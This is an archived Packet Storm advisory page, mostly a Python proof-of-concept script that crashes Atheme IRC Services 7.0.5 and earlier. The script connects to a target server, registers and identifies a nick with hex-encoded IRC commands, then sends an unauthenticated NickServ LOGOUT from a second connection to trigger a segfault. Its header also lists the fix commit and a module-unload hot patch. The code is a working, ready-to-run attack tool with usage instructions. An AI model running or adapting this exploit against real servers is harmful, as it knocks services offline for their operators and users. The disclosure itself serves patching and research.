the original cloud security

Atheme IRC Services 7.0.5 Denial Of Service

Atheme IRC Services 7.0.5 Denial Of Service
Posted Jan 17, 2013
Authored by Aph3x, UberLame, O_O, Apetrick

This is a denial of service proof of concept exploit that causes a core dump in Atheme IRC Services versions 7.0.5 and below with external logout as expressed in logout.c which is enabled by default.

tags | exploit, denial of service, proof of concept
MD5 | 5fecdf22359d929fc112d070cac5628a

Atheme IRC Services 7.0.5 Denial Of Service

Change Mirror Download
#!/usr/bin/python3
###################################################################################
# Monday, January 13, 2013
#
#
#
# _ _ .__ .__
# __| || |_| | ____ ____ |__| ____ ____
# \ __ / | _/ __ \ / ___\| |/ _ \ / \
# | || || |_\ ___// /_/ > ( <_> ) | \
# /_ ~~ _\____/\___ >___ /|__|\____/|___| /
# |_||_| \/_____/ \/
# http://www.zempirians.com
#
# 00100011 01101100 01100101 01100111 01101001 01101111 01101110
#
#
#
# -=[ Atheme - IRC Services Daemon ] =-
#
# [P]roof [o]f [C]oncept, Denial of Service
#
#
#
#
###################################################################################
# # T E A M #
# #######################
#
# O_O .....> Sent To Play All Alone <3
# UberLame .....> For Providing More Sweet, Sweet Cycles
# Aph3x .....> For Being Awesome
# Apetrick .....> For Not Letting Me Play With Him
#
###################################################################################
#
# ~~! SHOUT OUTS !~~
#
# a heyoz Eurydemus
# nikka l1nd BinaryTENSHi
# syk Gatsby
#
# ~~! Special Thanks !~~
#
# Packet Storm Security (www.packetstormsecurity.com) for archiving our
# concepts in order to help secure and educate those who read them.
#
###################################################################################
# SUMMARY #
################
#
# Bug Fix: [12/20/12]: https://github.com/atheme/atheme/commit/1aaa9e8f1d0b0b67b36c2a6318c71beaa7f39194
#
# Improper implementation of the logout command, results in a segfault
# when an unauthenticated user tries to deauth another authenticated user.
#
################
# VULNERABLE #
################
#
# Atheme Services up to 7.0.5 [and with logout.c loaded (by default)]
#
################
# CVE #
################
#
# [ No CVE Has Been Reported ]
#
################
# PATCH #
################
#
# - Proper Fix
# - Update To Current Version From GitHub
#
# - Hot Patch
# - Unload nickserv/logout
# > /quote operserv modunload nickserv/logout
# $ !services.global! Module nickserv/logout unloaded.
# $ -OperServ- Module nickserv/logout unloaded.
#
###################################################################################
# # #
# # H O W - T O #
# # #
# #######################
#
# Provide the Target: Server, Nickname, Password and Optionally the Port, and the
# script will deliver the staged payload...
#
# [!USE/]$ ./<file>.py -t <server> -P <port> -n <nickname> -p <password>
#
###################################################################################
from argparse import ArgumentParser
import socket

# DIRTY HACK TO CONVERT STRINGS TO HEX
def toHex( string_data ):
return ''.join(''.join([ hex( ord( ch ) ) for ch in string_data ]).split( '0x' ))

def deploy( sock, target, port, nick, passwd ):
try:
sock.connect(( target, int( port ) ))
except:
print( "\t[-] Payload Deployment Failed!" )
exit()

sock.send( b'\x4e\x49\x43\x4b\x20\x5f\x7a\x65\x6d\x70\x30\x64\x61\x79\x5f\x0d\x0a' )
sock.send( b'\x55\x53\x45\x52\x20\x7a\x65\x6d\x70\x30\x64\x61\x79\x20\x48\x45' + \
b'\x48\x45\x20\x48\x45\x48\x45\x20\x3a\x6f\x68\x61\x69\x20\x3c\x33' + \
b'\x0d\x0a' )

while True:
host_data = str( sock.recv(4096).strip() )

if ' 396 ' in host_data:
sock.send( bytes.fromhex( '505249564d5347204e49434b53455256203a4c4f474f555420{}20{}0d0a'.format( \
toHex( nick ), toHex( passwd ) ) ) )

print( '\t[+] Payload Deployed! <3' )
break


sock.send( b'\x51\x55\x49\x54\x0d\x0a' )
return sock.close()

def stage( target, port, nick, passwd ):
sock = socket.socket( socket.AF_INET, socket.SOCK_STREAM )
p_sock = socket.socket( socket.AF_INET, socket.SOCK_STREAM )

try:
sock.connect(( target, int( port ) ))
except:
print( "[-] Failed To Connect To {}".format( target ) )
exit()

sock.send( bytes.fromhex( '4e49434b20{}0d0a'.format( toHex( nick ) ) ) )
sock.send( b'\x55\x53\x45\x52\x20\x7a\x65\x6d\x70\x30\x64\x61\x79\x20\x48' + \
b'\x45\x48\x45\x20\x48\x45\x48\x45\x20\x3a\x6f\x68\x61\x69\x20' + \
b'\x3c\x33\x0d\x0a' )

while True:
host_data = str( sock.recv( 8096 ).strip() )

if ' 396 ' in host_data:
sock.send( bytes.fromhex( '505249564d5347204e49434b53455256203a524547495354455220' + \
'{}2064657673407a656d70697269616e732e636f6d0d0a0d0a'.format( toHex( passwd ) ) ) )

sock.send( bytes.fromhex( '505249564d5347204e49434b53455256203a4944454e5449465920{}0d0a'.format( toHex( passwd ) ) ) )

print( '\t[+] Staging Successful, Deploying Payload Against Target {}'.format( target ) )
deploy( p_sock, target, port, nick, passwd )
break

try:
msg = host_data.split()
if msg[0].lower() is 'ping':
sock.send( b"PONG {}\r\n".format( msg[1] ) )
except:
pass

sock.send( b'\x51\x55\x49\x54\x0d\x0a' )
sock.close()


if __name__ == '__main__':
parser = ArgumentParser( description='#legion Atheme IRC Services DoS' )

parser.add_argument( '-t', '--target', dest='target', help='IRCD Server To Connect On' )
parser.add_argument( '-P', '--port', dest='port', default=6667, help='Port To Connect On' )

parser.add_argument( '-n', '--nick', dest='nick', default='zemp0day', help='Nick To Use' )
parser.add_argument( '-p', '--pass', dest='passwd', default='yad0pmez', help='Password To Use' )

args = parser.parse_args()

if args.target is None:
parser.print_help()
exit()

stage( args.target, args.port, args.nick, args.passwd )

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

July 2017

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    2 Files
  • 2
    Jul 2nd
    3 Files
  • 3
    Jul 3rd
    15 Files
  • 4
    Jul 4th
    4 Files
  • 5
    Jul 5th
    15 Files
  • 6
    Jul 6th
    15 Files
  • 7
    Jul 7th
    10 Files
  • 8
    Jul 8th
    2 Files
  • 9
    Jul 9th
    10 Files
  • 10
    Jul 10th
    15 Files
  • 11
    Jul 11th
    15 Files
  • 12
    Jul 12th
    19 Files
  • 13
    Jul 13th
    16 Files
  • 14
    Jul 14th
    15 Files
  • 15
    Jul 15th
    3 Files
  • 16
    Jul 16th
    2 Files
  • 17
    Jul 17th
    8 Files
  • 18
    Jul 18th
    11 Files
  • 19
    Jul 19th
    15 Files
  • 20
    Jul 20th
    15 Files
  • 21
    Jul 21st
    15 Files
  • 22
    Jul 22nd
    7 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2016 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close